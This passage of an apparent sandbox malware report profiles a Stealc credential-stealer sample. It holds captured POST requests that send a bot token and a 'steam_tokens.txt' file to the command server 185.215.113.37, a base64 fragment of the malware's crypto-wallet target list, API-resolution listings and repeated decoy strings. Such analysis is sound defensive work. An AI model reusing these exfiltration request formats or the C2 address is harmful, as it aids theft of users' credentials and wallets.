ZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 10, 2024 18:23:23.347745895 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"files------GIJKKKFCFHCFIECBGDHI--
Oct 10, 2024 18:23:23.573040962 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:23.586024046 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKF Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file"------JKJECBAAAFHIIEBFCBKF--
Oct 10, 2024 18:23:24.303931952 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:24.340039015 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"ybncbhylepme------AEBAKJDGHIIJJKFHCFCA--
Oct 10, 2024 18:23:24.579241037 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 4676 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Oct 10, 2024 18:23:24.673101902 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGDBFIIECBGDGDGDHCAK--
Oct 10, 2024 18:23:25.392823935 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	12:23:02
Start date:	10/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xb80000
File size:	1'840'128 bytes
MD5 hash:	7C9061299E31179207D11E7C9790EE0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1707097418.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00B99860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,013323F8), ref: 00B998A1
GetProcAddress.KERNEL32(74DD0000,01332188), ref: 00B998BA
GetProcAddress.KERNEL32(74DD0000,01332170), ref: 00B998D2
GetProcAddress.KERNEL32(74DD0000,01332218), ref: 00B998EA
GetProcAddress.KERNEL32(74DD0000,01332278), ref: 00B99903
GetProcAddress.KERNEL32(74DD0000,013390F0), ref: 00B9991B
GetProcAddress.KERNEL32(74DD0000,01325870), ref: 00B99933
GetProcAddress.KERNEL32(74DD0000,01325830), ref: 00B9994C
GetProcAddress.KERNEL32(74DD0000,01332380), ref: 00B99964
GetProcAddress.KERNEL32(74DD0000,013321A0), ref: 00B9997C
GetProcAddress.KERNEL32(74DD0000,013322C0), ref: 00B99995
GetProcAddress.KERNEL32(74DD0000,013321B8), ref: 00B999AD
GetProcAddress.KERNEL32(74DD0000,01325730), ref: 00B999C5
GetProcAddress.KERNEL32(74DD0000,013321D0), ref: 00B999DE
GetProcAddress.KERNEL32(74DD0000,013321E8), ref: 00B999F6
GetProcAddress.KERNEL32(74DD0000,01325890), ref: 00B99A0E
GetProcAddress.KERNEL32(74DD0000,01332200), ref: 00B99A27
GetProcAddress.KERNEL32(74DD0000,013322D8), ref: 00B99A3F
GetProcAddress.KERNEL32(74DD0000,013258B0), ref: 00B99A57
GetProcAddress.KERNEL32(74DD0000,01332308), ref: 00B99A70
GetProcAddress.KERNEL32(74DD0000,013259B0), ref: 00B99A88
LoadLibraryA.KERNEL32(01332470,?,00B96A00), ref: 00B99A9A
LoadLibraryA.KERNEL32(01332500,?,00B96A00), ref: 00B99AAB
LoadLibraryA.KERNEL32(01332488,?,00B96A00), ref: 00B99ABD
LoadLibraryA.KERNEL32(013324D0,?,00B96A00), ref: 00B99ACF
LoadLibraryA.KERNEL32(013324B8,?,00B96A00), ref: 00B99AE0
GetProcAddress.KERNEL32(75A70000,013324A0), ref: 00B99B02
GetProcAddress.KERNEL32(75290000,013324E8), ref: 00B99B23
GetProcAddress.KERNEL32(75290000,01332530), ref: 00B99B3B
GetProcAddress.KERNEL32(75BD0000,01332518), ref: 00B99B5D
GetProcAddress.KERNEL32(75450000,013257B0), ref: 00B99B7E
GetProcAddress.KERNEL32(76E90000,01339190), ref: 00B99B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00B99BB6

Strings

NtQueryInformationProcess, xrefs: 00B99BAA

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: d0b7fc18be56d2df07815f02617a5dcd6223b6e47e4fd6c6cd999d509bdd6fc5
Instruction ID: d3d737abd41f0c0fb9d146081ffa858bec642c654d06809c2ddcfb918ae6af0a
Opcode Fuzzy Hash: d0b7fc18be56d2df07815f02617a5dcd6223b6e47e4fd6c6cd999d509bdd6fc5
Instruction Fuzzy Hash: ADA138B550034B9FD344EBACFD88E6637F9FB48309714851AE609C33A4D6399852CB76

Function 00B845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00B8460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B8479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B845E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B846CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B845C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B845F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B845DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B846B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B846AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B845D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B846D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B8471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B84662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B846C2

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti 